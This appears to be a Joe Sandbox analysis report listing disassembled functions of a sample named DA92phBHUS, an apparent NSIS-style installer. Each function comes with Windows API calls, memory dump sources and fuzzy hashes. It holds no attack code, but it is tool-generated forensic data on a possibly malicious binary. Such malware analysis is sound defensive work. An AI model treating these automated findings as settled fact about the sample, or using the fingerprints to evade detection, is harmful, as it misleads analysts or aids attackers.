                                                                                                          • Source File: 00000000.00000002.1782024602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.1781996879.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782043855.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782130425.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782130425.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782130425.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782306613.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_DA92phBHUS.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: MessageSend
                                                                                                          • String ID:
                                                                                                          • API String ID: 3850602802-0
                                                                                                          • Opcode ID: 5a31974c6ff286c329462761e498969acf5a6972bf7682297af78da516706e42
                                                                                                          • Instruction ID: d71d45502f518029c3ce7990b7c8d381ac94a1bb539c673c2af025244294d997
                                                                                                          • Opcode Fuzzy Hash: 5a31974c6ff286c329462761e498969acf5a6972bf7682297af78da516706e42
                                                                                                          • Instruction Fuzzy Hash: 96F0F471A10220DFD7555B74DD04B273699AB80361F24463BF911F62F1E6B8DC528B4E
                                                                                                          Function 00405E50 Relevance: 3.0, APIs: 2, Instructions: 15fileCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • GetFileAttributesW.KERNELBASE(00000003,004035C7,004DF0D8,80000000,00000003,?,?,?,00000000,00403A47,?), ref: 00405E54
                                                                                                          • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A47,?), ref: 00405E76
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1782024602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.1781996879.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782043855.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782130425.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782130425.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782130425.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782306613.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_DA92phBHUS.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: File$AttributesCreate
                                                                                                          • String ID:
                                                                                                          • API String ID: 415043291-0
                                                                                                          • Opcode ID: 6f817a4f04f8c8cc68f88398dd52813d28edb2112aa12cde00d29204b34f1fbe
                                                                                                          • Instruction ID: fe2e31f24f36ecb58ba6038de6e4569557e5a61990f2f31681ab57118d472e11
                                                                                                          • Opcode Fuzzy Hash: 6f817a4f04f8c8cc68f88398dd52813d28edb2112aa12cde00d29204b34f1fbe
                                                                                                          • Instruction Fuzzy Hash: BCD09E71554202EFEF098F60DE1AF6EBBA2FB94B00F11852CB292550F0DAB25819DB15
                                                                                                          Function 00405E30 Relevance: 3.0, APIs: 2, Instructions: 9COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • GetFileAttributesW.KERNELBASE(?,00406E81,?,?,?), ref: 00405E34
                                                                                                          • SetFileAttributesW.KERNEL32(?,00000000), ref: 00405E47
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1782024602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.1781996879.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782043855.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782130425.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782130425.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782130425.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782306613.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_DA92phBHUS.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: AttributesFile
                                                                                                          • String ID:
                                                                                                          • API String ID: 3188754299-0
                                                                                                          • Opcode ID: 404706a0ec70c465fc6e77d3f379a59e81a865ab84cdc077efcd7274a0164b66
                                                                                                          • Instruction ID: a99f375bd2b1051765f890e1d94d2f722c1bb1ba0a12d38356d8610c0186b9c0
                                                                                                          • Opcode Fuzzy Hash: 404706a0ec70c465fc6e77d3f379a59e81a865ab84cdc077efcd7274a0164b66
                                                                                                          • Instruction Fuzzy Hash: 84C01272404800EAC6000B34DF0881A7B62AB90330B268B39B0BAE00F0CB3488A99A18
                                                                                                          Function 00403336 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,000000FF,?,004033CE,000000FF,00000004,00000000,00000000,00000000), ref: 0040334D
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1782024602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.1781996879.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782043855.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782130425.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782130425.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782130425.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782306613.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_DA92phBHUS.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: FileRead
                                                                                                          • String ID:
                                                                                                          • API String ID: 2738559852-0
                                                                                                          • Opcode ID: 1a43d381f500bc8dc9f00bbbc079669c25ab728c1eaf5fecfa5fd6a2526f4c39
                                                                                                          • Instruction ID: a3bc5d39330dd194e4c7332763fdc94ca13499671d705f1c19c6925397c50364
                                                                                                          • Opcode Fuzzy Hash: 1a43d381f500bc8dc9f00bbbc079669c25ab728c1eaf5fecfa5fd6a2526f4c39
                                                                                                          • Instruction Fuzzy Hash: C8E08C32550118BFCB109EA69C40EE73B5CFB047A2F00C832BD55E5290DA30DA00EBE8
                                                                                                          Function 004037CC Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                            • Part of subcall function 00406038: CharNextW.USER32(?,*?|<>/":,00000000,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 0040609B
                                                                                                            • Part of subcall function 00406038: CharNextW.USER32(?,?,?,00000000), ref: 004060AA
                                                                                                            • Part of subcall function 00406038: CharNextW.USER32(?,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060AF
                                                                                                            • Part of subcall function 00406038: CharPrevW.USER32(?,?,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060C3
                                                                                                          • CreateDirectoryW.KERNELBASE(004D70C8,00000000,004D70C8,004D70C8,004D70C8,-00000002,00403A0B), ref: 004037ED
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1782024602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.1781996879.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782043855.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782130425.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782130425.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782130425.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782306613.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_DA92phBHUS.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Char$Next$CreateDirectoryPrev
                                                                                                          • String ID:
                                                                                                          • API String ID: 4115351271-0
                                                                                                          • Opcode ID: df63d9f6fb0dfe925f434423aee030f478bab57ed52ac2db2f8962d9fd449c2e
                                                                                                          • Instruction ID: 8ea1286759415c6f695425ed34242866ebe8a7a529327a4e56f2759b30593fc1
                                                                                                          • Opcode Fuzzy Hash: df63d9f6fb0dfe925f434423aee030f478bab57ed52ac2db2f8962d9fd449c2e
                                                                                                          • Instruction Fuzzy Hash: B1D0A921083C3221C562332A3D06FCF090C8F2635AB02C07BF841B61CA8B2C4B8240EE
                                                                                                          Function 00403DAF Relevance: 1.5, APIs: 1, Instructions: 9windowCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DC1
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1782024602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.1781996879.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782043855.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782130425.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782130425.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782130425.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782306613.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_DA92phBHUS.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: MessageSend
                                                                                                          • String ID:
                                                                                                          • API String ID: 3850602802-0
                                                                                                          • Opcode ID: 203c4a4104ade6b46efc04414fb016ca35add41c2a64233918ece76cb1940256
                                                                                                          • Instruction ID: 301fa2329b67e93c742f3c195cb428e9759bf169fd062939fd541a9b7e119014
                                                                                                          • Opcode Fuzzy Hash: 203c4a4104ade6b46efc04414fb016ca35add41c2a64233918ece76cb1940256
                                                                                                          • Instruction Fuzzy Hash: D3C04C71650601AADA108B509D45F1677595B50B41F544439B641F50E0D674E450DA1E
                                                                                                          Function 00403368 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • SetFilePointer.KERNELBASE(00000000,00000000,00000000,0040375A,?,?,?,?,00000000,00403A47,?), ref: 00403376
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1782024602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.1781996879.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782043855.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782130425.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782130425.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782130425.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782306613.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_DA92phBHUS.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: FilePointer
                                                                                                          • String ID:
                                                                                                          • API String ID: 973152223-0
                                                                                                          • Opcode ID: ff5c9719b5bb24227ed98436e19d1f66b73f6b097333bfca9e4e1763c30da83c
                                                                                                          • Instruction ID: da19c3e449f5d10d282cbd9bcc1d8f2f369397d5e390659c1e8fea63e82898b0
                                                                                                          • Opcode Fuzzy Hash: ff5c9719b5bb24227ed98436e19d1f66b73f6b097333bfca9e4e1763c30da83c
                                                                                                          • Instruction Fuzzy Hash: 0CB09231140204AEDA214B109E05F067A21FB94700F208824B2A0380F086711420EA0C
                                                                                                          Function 00403D98 Relevance: 1.5, APIs: 1, Instructions: 6windowCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • SendMessageW.USER32(00000028,?,00000001,004057B4), ref: 00403DA6
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1782024602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.1781996879.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782043855.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782130425.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782130425.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782130425.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782306613.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_DA92phBHUS.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: MessageSend
                                                                                                          • String ID:
                                                                                                          • API String ID: 3850602802-0
                                                                                                          • Opcode ID: 8ef0c84af5b69eb6e5c04aecb335cbd5d798096170d60dc049d97623b8df0028
                                                                                                          • Instruction ID: f61ffac979fbda5733e9df3da2bdae5977773398d3d4f9e0d67d11d125479468
                                                                                                          • Opcode Fuzzy Hash: 8ef0c84af5b69eb6e5c04aecb335cbd5d798096170d60dc049d97623b8df0028
                                                                                                          • Instruction Fuzzy Hash: EFB09235181A00AADE614B00DF0AF457A62A764701F008079B245640B0CAB200E0DB08
                                                                                                          Function 00403D85 Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • KiUserCallbackDispatcher.NTDLL(?,0040574D), ref: 00403D8F
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1782024602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.1781996879.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782043855.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782130425.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782130425.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782130425.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782306613.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_DA92phBHUS.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CallbackDispatcherUser
                                                                                                          • String ID:
                                                                                                          • API String ID: 2492992576-0
                                                                                                          • Opcode ID: 7b5b3f07ec4b69a7f183f6b544b36b38adf2938630adbd4e30d083ffe7510c70
                                                                                                          • Instruction ID: d14db2bc66c636a64d409f7b36464c270e9f3e97be8c2f7aaa1954d4611ec3db
                                                                                                          • Opcode Fuzzy Hash: 7b5b3f07ec4b69a7f183f6b544b36b38adf2938630adbd4e30d083ffe7510c70
                                                                                                          • Instruction Fuzzy Hash: 8DA01275005500DBCF014B40EF048067A61B7503007108478F1810003086310420EB08

                                                                                                          Non-executed Functions

                                                                                                          Function 0040497C Relevance: 65.2, APIs: 33, Strings: 4, Instructions: 470windowmemoryCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • GetDlgItem.USER32(?,000003F9), ref: 00404993
                                                                                                          • GetDlgItem.USER32(?,00000408), ref: 004049A0
                                                                                                          • GlobalAlloc.KERNEL32(00000040,?), ref: 004049EF
                                                                                                          • LoadBitmapW.USER32(0000006E), ref: 00404A02
                                                                                                          • SetWindowLongW.USER32(?,000000FC,Function_000048CC), ref: 00404A1C
                                                                                                          • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404A2E
                                                                                                          • ImageList_AddMasked.COMCTL32(00000000,?,00FF00FF), ref: 00404A42
                                                                                                          • SendMessageW.USER32(?,00001109,00000002), ref: 00404A58
                                                                                                          • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404A64
                                                                                                          • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404A74
                                                                                                          • DeleteObject.GDI32(?), ref: 00404A79
                                                                                                          • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404AA4
                                                                                                          • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404AB0
                                                                                                          • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404B51
                                                                                                          • SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 00404B74
                                                                                                          • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404B85
                                                                                                          • GetWindowLongW.USER32(?,000000F0), ref: 00404BAF
                                                                                                          • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404BBE
                                                                                                          • ShowWindow.USER32(?,00000005), ref: 00404BCF
                                                                                                          • SendMessageW.USER32(?,00000419,00000000,?), ref: 00404CCD
                                                                                                          • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00404D28
                                                                                                          • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00404D3D
                                                                                                          • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00404D61
                                                                                                          • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00404D87
                                                                                                          • ImageList_Destroy.COMCTL32(?), ref: 00404D9C
                                                                                                          • GlobalFree.KERNEL32(?), ref: 00404DAC
                                                                                                          • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00404E1C
                                                                                                          • SendMessageW.USER32(?,00001102,?,?), ref: 00404ECA
                                                                                                          • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00404ED9
                                                                                                          • InvalidateRect.USER32(?,00000000,00000001), ref: 00404EF9
                                                                                                          • ShowWindow.USER32(?,00000000), ref: 00404F49
                                                                                                          • GetDlgItem.USER32(?,000003FE), ref: 00404F54
                                                                                                          • ShowWindow.USER32(00000000), ref: 00404F5B
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1782024602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.1781996879.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782043855.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782130425.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782130425.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782130425.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782306613.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_DA92phBHUS.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                                          • String ID: $ @$M$N
                                                                                                          • API String ID: 1638840714-3479655940
                                                                                                          • Opcode ID: 222e44079ed98782fbb34ec8da515d99173e785f6e02dcb26c66960398e67004
                                                                                                          • Instruction ID: e2b6c32447eba08f07ab18e4c0942225b167af9b9c7e550a0b0592367213937f
                                                                                                          • Opcode Fuzzy Hash: 222e44079ed98782fbb34ec8da515d99173e785f6e02dcb26c66960398e67004
                                                                                                          • Instruction Fuzzy Hash: 09026CB0900209AFEF209FA4CD45AAE7BB5FB84314F10413AF615B62E1D7B89D91DF58
                                                                                                          Function 004044A5 Relevance: 33.6, APIs: 15, Strings: 4, Instructions: 300stringkeyboardCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • GetDlgItem.USER32(?,000003F0), ref: 004044F9
                                                                                                          • IsDlgButtonChecked.USER32(?,000003F0), ref: 00404507
                                                                                                          • GetDlgItem.USER32(?,000003FB), ref: 00404527
                                                                                                          • GetAsyncKeyState.USER32(00000010), ref: 0040452E
                                                                                                          • GetDlgItem.USER32(?,000003F0), ref: 00404543
                                                                                                          • ShowWindow.USER32(00000000,00000008,?,00000008,000000E0), ref: 00404554
                                                                                                          • SetWindowTextW.USER32(?,?), ref: 00404583
                                                                                                          • SHBrowseForFolderW.SHELL32(?), ref: 0040463D
                                                                                                          • lstrcmpiW.KERNEL32(00462540,00447240,00000000,?,?), ref: 0040467A
                                                                                                          • lstrcatW.KERNEL32(?,00462540), ref: 00404686
                                                                                                          • SetDlgItemTextW.USER32(?,000003FB,?), ref: 00404696
                                                                                                          • CoTaskMemFree.OLE32(00000000), ref: 00404648
                                                                                                            • Part of subcall function 00405C84: GetDlgItemTextW.USER32(00000001,00000001,00002004,00403F81), ref: 00405C97
                                                                                                            • Part of subcall function 00406038: CharNextW.USER32(?,*?|<>/":,00000000,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 0040609B
                                                                                                            • Part of subcall function 00406038: CharNextW.USER32(?,?,?,00000000), ref: 004060AA
                                                                                                            • Part of subcall function 00406038: CharNextW.USER32(?,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060AF
                                                                                                            • Part of subcall function 00406038: CharPrevW.USER32(?,?,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060C3
                                                                                                            • Part of subcall function 00403E74: lstrcatW.KERNEL32(00000000,00000000,0046A560,004C70A8,install.log,00405A9C,004C70A8,004C70A8,004D30C0,00447240,80000001,Control Panel\Desktop\ResourceLocale,00000000,00447240,00000000,00000006), ref: 00403E8F
                                                                                                          • GetDiskFreeSpaceW.KERNEL32(00443238,?,?,0000040F,?,00443238,00443238,?,00000000,00443238,?,?,000003FB,?), ref: 00404759
                                                                                                          • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404774
                                                                                                            • Part of subcall function 00406805: GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6
                                                                                                          • SetDlgItemTextW.USER32(00000000,00000400,00409264), ref: 004047ED
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1782024602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.1781996879.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782043855.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782130425.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782130425.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782130425.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782306613.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_DA92phBHUS.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Item$CharText$Next$FreeWindowlstrcat$AsyncBrowseButtonCheckedDiskFolderPrevShowSpaceStateTaskVersionlstrcmpi
                                                                                                          • String ID: 82D$@%F$@rD$A
                                                                                                          • API String ID: 3347642858-1086125096
                                                                                                          • Opcode ID: 41223eded68e0cc8c9bf9fa9bd2dae48608aba550ad56c91da83586f0d18507e
                                                                                                          • Instruction ID: 5c5d6a603380bcdbc7d7d35b60f5621b43697e5e98684918e033f9398a36e476
                                                                                                          • Opcode Fuzzy Hash: 41223eded68e0cc8c9bf9fa9bd2dae48608aba550ad56c91da83586f0d18507e
                                                                                                          • Instruction Fuzzy Hash: D1B1A4B1900209BBDB11AFA1CD85AAF7AB8EF45314F10847BF605B72D1D77C8A41CB59
                                                                                                          Function 00406ED2 Relevance: 30.0, APIs: 14, Strings: 3, Instructions: 270filestringCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00406EF6
                                                                                                          • ReadFile.KERNEL32(00000000,?,0000000C,?,00000000), ref: 00406F30
                                                                                                          • ReadFile.KERNEL32(?,?,00000010,?,00000000), ref: 00406FA9
                                                                                                          • lstrcpynA.KERNEL32(?,?,00000005), ref: 00406FB5
                                                                                                          • lstrcmpA.KERNEL32(name,?), ref: 00406FC7
                                                                                                          • CloseHandle.KERNEL32(?), ref: 004071E6
                                                                                                            • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                                                            • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1782024602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.1781996879.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782043855.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782130425.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782130425.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782130425.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782306613.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_DA92phBHUS.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: File$Read$CloseCreateHandlelstrcmplstrcpynlstrlenwvsprintf
                                                                                                          • String ID: %s: failed opening file "%s"$GetTTFNameString$name
                                                                                                          • API String ID: 1916479912-1189179171
                                                                                                          • Opcode ID: c1ee4f9d51a5711eefddbfc324bacbf89cb8dd321db642bada23a62a27e44b0a
                                                                                                          • Instruction ID: 34713ba181b26839f7619e948cf229fd8716e5ee99c03f3e8673f79b0d3e70cf
                                                                                                          • Opcode Fuzzy Hash: c1ee4f9d51a5711eefddbfc324bacbf89cb8dd321db642bada23a62a27e44b0a
                                                                                                          • Instruction Fuzzy Hash: 9091BF70D1412DAACF04EBA5DD909FEBBBAEF48301F00416AF592F72D0E6785A05DB64
                                                                                                          Function 00406C9B Relevance: 29.9, APIs: 9, Strings: 8, Instructions: 190filestringCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • DeleteFileW.KERNEL32(?,?,004C30A0), ref: 00406CB8
                                                                                                          • lstrcatW.KERNEL32(0045C918,\*.*,0045C918,?,-00000002,004D70C8,?,004C30A0), ref: 00406D09
                                                                                                          • lstrcatW.KERNEL32(?,00408838,?,0045C918,?,-00000002,004D70C8,?,004C30A0), ref: 00406D29
                                                                                                          • lstrlenW.KERNEL32(?), ref: 00406D2C
